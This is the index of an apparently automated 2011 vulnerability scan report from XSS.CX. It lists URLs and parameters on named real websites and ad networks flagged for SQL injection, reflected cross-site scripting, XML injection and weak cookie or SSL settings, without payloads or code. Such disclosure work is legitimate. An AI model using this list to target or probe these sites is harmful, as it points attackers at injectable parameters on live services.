Vulnerable Applications, XSS, SQL Injection, DORK, GHDB Report for April 23, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sun Apr 24 09:09:29 CDT 2011.


Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

1.1. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197 [REST URL parameter 3]

1.2. http://www.hotelclub.com/ [Referer HTTP header]

1.3. http://www.nextadvisor.com/link.php [__utma cookie]

2. File path traversal

3. LDAP injection

4. XPath injection

5. Cross-site scripting (reflected)

5.1. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [labels parameter]

5.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [redirecturl2 parameter]

5.3. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbdata2 parameter]

5.4. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [rtbip parameter]

5.5. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15 [sz parameter]

5.6. http://ads.adxpose.com/ads/ads.js [uid parameter]

5.7. http://ar.voicefive.com/b/rc.pli [func parameter]

5.8. http://event.adxpose.com/event.flow [uid parameter]

5.9. http://ib.adnxs.com/ab [cnd parameter]

5.10. http://kroogy.com/favicon.ico [REST URL parameter 1]

5.11. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 1]

5.12. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 2]

5.13. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 1]

5.14. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 2]

5.15. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 1]

5.16. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 2]

5.17. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 1]

5.18. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 2]

5.19. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 1]

5.20. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 2]

5.21. http://kroogy.com/pub/banner_728_90_random.php [REST URL parameter 1]

5.22. http://kroogy.com/search/emailafriend [REST URL parameter 1]

5.23. http://kroogy.com/search/emailafriend [REST URL parameter 2]

5.24. http://kroogy.com/search/images/blank.gif [REST URL parameter 2]

5.25. http://kroogy.com/search/index.php [page parameter]

5.26. http://kroogy.com/search/news [REST URL parameter 1]

5.27. http://kroogy.com/search/news [REST URL parameter 2]

5.28. http://kroogy.com/search/noresults [REST URL parameter 1]

5.29. http://kroogy.com/search/noresults [REST URL parameter 2]

5.30. http://kroogy.com/search/random.php [REST URL parameter 1]

5.31. http://kroogy.com/search/random.php [REST URL parameter 2]

5.32. http://kroogy.com/search/redir [REST URL parameter 1]

5.33. http://kroogy.com/search/redir [REST URL parameter 2]

5.34. http://kroogy.com/search/special [REST URL parameter 1]

5.35. http://kroogy.com/search/special [REST URL parameter 2]

5.36. http://kroogy.com/search/videos [REST URL parameter 1]

5.37. http://kroogy.com/search/videos [REST URL parameter 2]

5.38. http://kroogy.com/search/web [REST URL parameter 1]

5.39. http://kroogy.com/search/web [REST URL parameter 2]

5.40. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

5.41. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471 [REST URL parameter 4]

5.42. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

5.43. http://pub.retailer-amazon.net/banner_120_600_a.php [name of an arbitrarily supplied request parameter]

5.44. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

5.45. http://pub.retailer-amazon.net/banner_120_600_a.php [search parameter]

5.46. http://widgets.digg.com/buttons/count [url parameter]

5.47. http://www.dictof.com/favicon.ico [REST URL parameter 1]

5.48. http://www.lifelock.com/offers/faces/female/ [promocodehide parameter]

5.49. http://www.nextadvisor.com/favicon.ico [REST URL parameter 1]

5.50. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 1]

5.51. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

5.52. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 2]

5.53. http://www.nextadvisor.com/images/blog_sidebar/internet_fax_sb.jpg [REST URL parameter 3]

5.54. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 1]

5.55. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

5.56. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 2]

5.57. http://www.nextadvisor.com/images/blog_sidebar/online_dating_sb.jpg [REST URL parameter 3]

5.58. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.59. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 1]

5.60. http://www.nextadvisor.com/includes/javascript.php [REST URL parameter 2]

5.61. http://www.nextadvisor.com/link.php [REST URL parameter 1]

5.62. http://www.nextadvisor.com/pmid [REST URL parameter 1]

5.63. http://www.nextadvisor.com/pmid [kw parameter]

5.64. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

5.65. http://www.nextadvisor.com/pmid/ [REST URL parameter 1]

5.66. http://www.nextadvisor.com/pmid/ [kw parameter]

5.67. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 1]

5.68. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

5.69. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 2]

5.70. http://www.nextadvisor.com/pmid/js/jquery.js [REST URL parameter 3]

5.71. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 1]

5.72. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

5.73. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 2]

5.74. http://www.nextadvisor.com/pmid/js/jquery.validate.min.js [REST URL parameter 3]

5.75. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

5.76. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 1]

5.77. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 2]

5.78. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

5.79. https://www.trustedid.com/idfide01/ [promoCodeRefIde parameter]

5.80. https://www.trustedid.com/idfide01/ [promoCodeRefIdf parameter]

5.81. https://www.trustedid.com/suzeidprotector/ [email parameter]

5.82. https://www.trustedid.com/suzeidprotector/ [first_name parameter]

5.83. https://www.trustedid.com/suzeidprotector/ [last_name parameter]

5.84. http://www.hotelclub.com/ [Referer HTTP header]

5.85. http://www.nextadvisor.com/link.php [Referer HTTP header]

5.86. http://www.nextadvisor.com/pmid [Referer HTTP header]

5.87. http://www.nextadvisor.com/pmid/ [Referer HTTP header]

5.88. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.89. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.90. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.91. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.92. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.93. http://breathe.c3metrics.com/c3realview.js [C3UID cookie]

5.94. http://www.lifelock.com/about/leadership/management/ [LifeLockEnrollment cookie]

5.95. http://www.lifelock.com/about/lifelock-in-the-community/ [LifeLockEnrollment cookie]

5.96. http://www.lifelock.com/guarantee/ [LifeLockEnrollment cookie]

5.97. http://www.lifelock.com/how-it-works/ [LifeLockEnrollment cookie]

5.98. http://www.lifelock.com/identity-theft/ [LifeLockEnrollment cookie]

6. Flash cross-domain policy

6.1. http://2byto.com/crossdomain.xml

6.2. http://4.bp.blogspot.com/crossdomain.xml

6.3. http://ad.amgdgt.com/crossdomain.xml

6.4. http://ad.doubleclick.net/crossdomain.xml

6.5. http://ajax.googleapis.com/crossdomain.xml

6.6. http://analytic.hotelclub.com/crossdomain.xml

6.7. http://ar.voicefive.com/crossdomain.xml

6.8. http://at.amgdgt.com/crossdomain.xml

6.9. http://b.scorecardresearch.com/crossdomain.xml

6.10. http://b.voicefive.com/crossdomain.xml

6.11. http://bh.contextweb.com/crossdomain.xml

6.12. http://bp.specificclick.net/crossdomain.xml

6.13. http://clk.atdmt.com/crossdomain.xml

6.14. http://ctix8.cheaptickets.com/crossdomain.xml

6.15. http://data.coremetrics.com/crossdomain.xml

6.16. http://ec.atdmt.com/crossdomain.xml

6.17. http://event.adxpose.com/crossdomain.xml

6.18. http://exch.quantserve.com/crossdomain.xml

6.19. http://fls.doubleclick.net/crossdomain.xml

6.20. http://ib.adnxs.com/crossdomain.xml

6.21. http://img1.wsimg.com/crossdomain.xml

6.22. http://img3.wsimg.com/crossdomain.xml

6.23. http://m.adnxs.com/crossdomain.xml

6.24. http://media.fastclick.net/crossdomain.xml

6.25. http://roia.biz/crossdomain.xml

6.26. http://s0.2mdn.net/crossdomain.xml

6.27. http://spe.atdmt.com/crossdomain.xml

6.28. http://switch.atdmt.com/crossdomain.xml

6.29. http://tracking.keywordmax.com/crossdomain.xml

6.30. http://www.dictof.com/crossdomain.xml

6.31. http://googleads.g.doubleclick.net/crossdomain.xml

6.32. http://i35.tinypic.com/crossdomain.xml

6.33. http://pagead2.googlesyndication.com/crossdomain.xml

6.34. http://partners.nextadnetwork.com/crossdomain.xml

6.35. http://www.apmebf.com/crossdomain.xml

6.36. http://www.emjcd.com/crossdomain.xml

6.37. http://www.kqzyfj.com/crossdomain.xml

6.38. http://www.securepaynet.net/crossdomain.xml

6.39. http://www.tqlkg.com/crossdomain.xml

6.40. http://media.compete.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://analytic.hotelclub.com/clientaccesspolicy.xml

7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.4. http://b.voicefive.com/clientaccesspolicy.xml

7.5. http://clk.atdmt.com/clientaccesspolicy.xml

7.6. http://ec.atdmt.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://spe.atdmt.com/clientaccesspolicy.xml

7.9. http://switch.atdmt.com/clientaccesspolicy.xml

7.10. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.11. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

9. XML injection

9.1. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 1]

9.2. http://2byto.com/bluepixel/cnt-gif1x1.php [REST URL parameter 2]

9.3. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 1]

9.4. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 2]

9.5. http://data.whicdn.com/images/1311756/l_1413edbb54e52d34fb98d4b6cecdb8e8_large.jpg [REST URL parameter 3]

9.6. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 1]

9.7. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 2]

9.8. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 3]

9.9. http://delivery.ctasnet.com/adserver/www/delivery/tjs.php [REST URL parameter 4]

9.10. http://kroogy.com/search/images/blank.gif [REST URL parameter 3]

9.11. http://www.dictof.com/favicon.ico [REST URL parameter 1]

10. SSL cookie without secure flag set

10.1. https://secure.identityguard.com/EnrollmentStep1

10.2. https://secure.lifelock.com/portal/login

10.3. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

10.4. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

10.5. https://secure.lifelock.com/enrollment

10.6. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

10.7. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

10.8. https://secure.lifelock.com/scripts/global.js

10.9. https://secure.lifelock.com/styles/login.css

10.10. https://secure.lifelock.com/styles/theme-lifelock.css

10.11. https://secure.lifelock.com/styles/webstore.css

10.12. https://www.trustedid.com/idfide01/

10.13. https://www.trustedid.com/suzeidprotector/

11. Session token in URL

11.1. http://bh.contextweb.com/bh/set.aspx

11.2. https://secure.lifelock.com/portal/login

11.3. https://www.econsumer.equifax.com/otc/landing.ehtml

12. SSL certificate

12.1. https://secure.identityguard.com/

12.2. https://secure.lifelock.com/

12.3. https://www.econsumer.equifax.com/

12.4. https://www.pcisecuritystandards.org/

12.5. https://www.trustedid.com/

13. Open redirection

14. Cookie without HttpOnly flag set

14.1. http://ads.adxpose.com/ads/ads.js

14.2. http://affiliate.idgtracker.com/rd/r.php

14.3. http://event.adxpose.com/event.flow

14.4. http://img.securepaynet.net/image.aspx

14.5. http://leadback.netseer.com/dsatserving2/servlet/log

14.6. https://secure.identityguard.com/EnrollmentStep1

14.7. https://secure.lifelock.com/portal/login

14.8. http://www.dictof.com/

14.9. https://www.econsumer.equifax.com/otc/landing.ehtml

14.10. http://www.hotelclub.com/

14.11. http://www.identityguard.com/ipages/le4/styles/ie.css

14.12. http://www.lunlizy.net/

14.13. http://www.nextadvisor.com/link.php

14.14. http://2byto.com/bluepixel/cnt-gif1x1.php

14.15. http://2byto.com/bluepixel/cnt-gif1x1.php

14.16. http://ad.amgdgt.com/ads/

14.17. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

14.18. http://ad.doubleclick.net/adj/inet.hostcat/_default

14.19. http://ad.yieldmanager.com/pixel

14.20. http://ads.revsci.net/adserver/ako

14.21. http://ads.revsci.net/adserver/ako

14.22. http://ads.revsci.net/adserver/ako

14.23. http://ads.revsci.net/adserver/ako

14.24. http://ads.revsci.net/adserver/ako

14.25. http://ads.revsci.net/adserver/ako

14.26. http://ads.revsci.net/adserver/ako

14.27. http://ads.revsci.net/adserver/ako

14.28. http://ads.revsci.net/adserver/ako

14.29. http://affiliate.idgtracker.com/rd/r.php

14.30. http://affiliate.idgtracker.com/rd/r.php

14.31. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

14.32. http://ar.voicefive.com/b/wc_beacon.pli

14.33. http://ar.voicefive.com/bmx3/broker.pli

14.34. http://at.amgdgt.com/ads/

14.35. http://b.scorecardresearch.com/p

14.36. http://b.voicefive.com/b

14.37. http://bh.contextweb.com/bh/set.aspx

14.38. http://clk.atdmt.com/go/253732016/direct

14.39. http://cmi.netseer.com/match

14.40. http://cmi.netseer.com/redirect

14.41. http://ctix8.cheaptickets.com/dcscfchfzvz5bdrpz13vsgjna_9r8u/dcs.gif

14.42. http://img167.imageshack.us/img167/6361/06ls4.jpg

14.43. http://img262.imageshack.us/img262/3146/17ls3.jpg

14.44. http://kroogy.com/

14.45. http://leadback.advertising.com/adcedge/lb

14.46. http://media.fastclick.net/w/tre

14.47. http://partners.nextadnetwork.com/z/246/CD1/gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-04

14.48. http://partners.nextadnetwork.com/z/371/CD1/id4+106163471

14.49. http://partners.nextadnetwork.com/z/48/CD1/945440258

14.50. http://partners.nextadnetwork.com/z/482/CD1/id+gid9a%20identity%20theft%20resource_ordering34--2011-04-23--20-10-01

14.51. http://partners.nextadnetwork.com/z/518/CD1/idf+903230053

14.52. http://pixel.mathtag.com/event/img

14.53. http://pixel.rubiconproject.com/tap.php

14.54. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

14.55. http://roia.biz/im/n/Pr6Nvq1BAAGKcUMAAAVwQgAArr9mMQA-A

14.56. http://roia.biz/im/n/oW_Uvq1BAAGKcUMAAAVwQgAArEVmMQA-A

14.57. http://sales.liveperson.net/hc/71003277/

14.58. http://sales.liveperson.net/hc/71003277/

14.59. http://sales.liveperson.net/hc/71003277/

14.60. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

14.61. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff

14.62. https://secure.lifelock.com/enrollment

14.63. https://secure.lifelock.com/resources/org.apache.wicket.ajax.WicketAjaxReference/wicket-ajax.js

14.64. https://secure.lifelock.com/resources/org.apache.wicket.markup.html.WicketEventReference/wicket-event.js

14.65. https://secure.lifelock.com/scripts/global.js

14.66. https://secure.lifelock.com/styles/login.css

14.67. https://secure.lifelock.com/styles/theme-lifelock.css

14.68. https://secure.lifelock.com/styles/webstore.css

14.69. http://stats.kroogy.com/cnt-gif1x1.php

14.70. http://stats.kroogy.com/cnt-gif1x1.php

14.71. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

14.72. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

14.73. http://www.googleadservices.com/pagead/aclk

14.74. http://www.identityguard.com/gscc.aspx

14.75. http://www.lifelock.com/about/leadership/management/

14.76. http://www.lifelock.com/about/lifelock-in-the-community/

14.77. http://www.lifelock.com/guarantee/

14.78. http://www.lifelock.com/how-it-works/

14.79. http://www.lifelock.com/identity-theft/

14.80. http://www.lifelock.com/offers/faces/female/

14.81. http://www.nextadvisor.com/link.php

14.82. http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en¤cy=USD&subdomain=HCAU&channel=home&Section=main&adsize=160x600&pos=external&country=US

14.83. http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en¤cy=USD&subdomain=HCAU&channel=home&Section=main&adsize=728x90&pos=bottom&country=US

14.84. http://www.securepaynet.net/default.aspx

14.85. http://www.securepaynet.net/external/json/SalesBanner.aspx

14.86. https://www.trustedid.com/idfide01/

14.87. https://www.trustedid.com/registration.php

14.88. https://www.trustedid.com/suzeidprotector/

15. Password field with autocomplete enabled

15.1. https://secure.lifelock.com/portal/login

15.2. https://secure.lifelock.com/portal/login

15.3. https://secure.lifelock.com/portal/login

15.4. https://secure.lifelock.com/portal/login

15.5. https://secure.lifelock.com/portal/login

15.6. https://secure.lifelock.com/portal/login

15.7. https://secure.lifelock.com/portal/login

15.8. http://www.dictof.com/

15.9. http://www.hotelclub.com/

15.10. http://www.securepaynet.net/default.aspx

16. Referer-dependent response

16.1. http://breathe.c3metrics.com/c3realview.js

16.2. http://www.dictof.com/

16.3. http://www.securepaynet.net/default.aspx

17. Cross-domain POST

18. Cookie scoped to parent domain

18.1. http://ad.amgdgt.com/ads/

18.2. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

18.3. http://ad.doubleclick.net/adj/inet.hostcat/_default

18.4. http://ads.revsci.net/adserver/ako

18.5. http://ads.revsci.net/adserver/ako

18.6. http://ads.revsci.net/adserver/ako

18.7. http://ads.revsci.net/adserver/ako

18.8. http://ads.revsci.net/adserver/ako

18.9. http://ads.revsci.net/adserver/ako

18.10. http://ads.revsci.net/adserver/ako

18.11. http://ads.revsci.net/adserver/ako

18.12. http://ads.revsci.net/adserver/ako

18.13. http://analytic.hotelclub.com/b/ss/flairviewhcprod/1/H.17/s84063693960197

18.14. http://ar.voicefive.com/b/wc_beacon.pli

18.15. http://ar.voicefive.com/bmx3/broker.pli

18.16. http://at.amgdgt.com/ads/

18.17. http://b.scorecardresearch.com/p

18.18. http://b.voicefive.com/b

18.19. http://bh.contextweb.com/bh/set.aspx

18.20. http://clk.atdmt.com/go/253732016/direct

18.21. http://cmi.netseer.com/match

18.22. http://cmi.netseer.com/redirect

18.23. http://ib.adnxs.com/ab

18.24. http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http://pub.retailer-amazon.net/banner_120_600_a.php/clickenc=http://googleads.g.doubleclick.net/aclk

18.25. http://ib.adnxs.com/seg

18.26. http://img.securepaynet.net/image.aspx

18.27. http://img167.imageshack.us/img167/6361/06ls4.jpg

18.28. http://img262.imageshack.us/img262/3146/17ls3.jpg

18.29. http://leadback.advertising.com/adcedge/lb

18.30. http://leadback.netseer.com/dsatserving2/servlet/log

18.31. http://m.adnxs.com/msftcookiehandler

18.32. http://media.fastclick.net/w/tre

18.33. http://pixel.mathtag.com/event/img

18.34. http://pixel.rubiconproject.com/tap.php

18.35. http://r1-ads.ace.advertising.com/site=801362/size=728090/u=2/bnum=53765754/hr=7/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.hotelclub.com%252F

18.36. http://sales.liveperson.net/hc/71003277/

18.37. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

18.38. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

18.39. http://www.securepaynet.net/default.aspx

18.40. http://www.securepaynet.net/external/json/SalesBanner.aspx

18.41. https://www.trustedid.com/idfide01/

18.42. https://www.trustedid.com/registration.php

18.43. https://www.trustedid.com/suzeidprotector/

19. Cross-domain Referer leakage

19.1. http://ad.amgdgt.com/ads/

19.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

19.3. http://ad.doubleclick.net/adj/inet.hostcat/_default

19.4. http://bp.specificclick.net/

19.5. http://cm.g.doubleclick.net/pixel

19.6. http://fls.doubleclick.net/activityi

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://googleads.g.doubleclick.net/pagead/ads

19.12. http://googleads.g.doubleclick.net/pagead/ads

19.13. http://googleads.g.doubleclick.net/pagead/ads

19.14. http://googleads.g.doubleclick.net/pagead/ads

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://googleads.g.doubleclick.net/pagead/ads

19.18. http://ib.adnxs.com/ab

19.19. http://kroogy.com/search/emailafriend

19.20. http://kroogy.com/search/noresults

19.21. http://kroogy.com/search/web

19.22. http://pub.retailer-amazon.net/banner_120_600_b.php

19.23. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

19.24. https://secure.lifelock.com/enrollment

19.25. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

19.26. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

19.27. https://www.econsumer.equifax.com/otc/landing.ehtml

19.28. http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH

19.29. http://www.hotelclub.com/common/adRevresda.asp

19.30. http://www.hotelclub.com/common/adRevresda.asp

19.31. http://www.identityguard.com/gscc.aspx

19.32. http://www.identityguard.com/ipages/le4/letp30daysfree1.html

19.33. http://www.kqzyfj.com/click-1911961-10751987

19.34. http://www.kqzyfj.com/click-1911961-10751987

19.35. http://www.lifelock.com/offers/faces/female/

19.36. http://www.securepaynet.net/default.aspx

19.37. https://www.trustedid.com/idfide01/

19.38. https://www.trustedid.com/registration.php

19.39. https://www.trustedid.com/suzeidprotector/

20. Cross-domain script include

20.1. http://ad.amgdgt.com/ads/

20.2. http://ad.doubleclick.net/adi/N2886.151350.QUANTCAST.COM/B5403001.15

20.3. http://googleads.g.doubleclick.net/pagead/ads

